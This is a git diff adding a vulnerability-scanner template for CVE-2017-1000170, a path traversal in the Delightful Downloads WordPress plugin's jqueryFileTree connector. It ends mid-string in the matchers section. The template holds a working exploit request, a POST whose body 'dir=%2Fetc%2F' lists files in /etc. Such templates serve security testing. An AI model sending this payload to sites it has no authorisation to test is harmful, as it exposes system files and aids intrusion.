diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml
new file mode 100644
index 0000000000..cb3e001dd0
--- /dev/null
+++ b/cves/2017/CVE-2017-1000170.yaml
@@ -0,0 +1,26 @@
+id: CVE-2017-1000170
+
+info:
+ name: WordPress Plugin Delightful Downloads Jquery File Tree 2.1.5 Path Traversal
+ author: dwisiswant0
+ severity: high
+ reference: https://www.exploit-db.com/exploits/49693
+ description: jqueryFileTree 2.1.5 and older Directory Traversal
+ tags: cve,cve2017,wordpress,wp-plugin,lfi
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"
+ body: "dir=%2Fetc%2F&onlyFiles=true"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "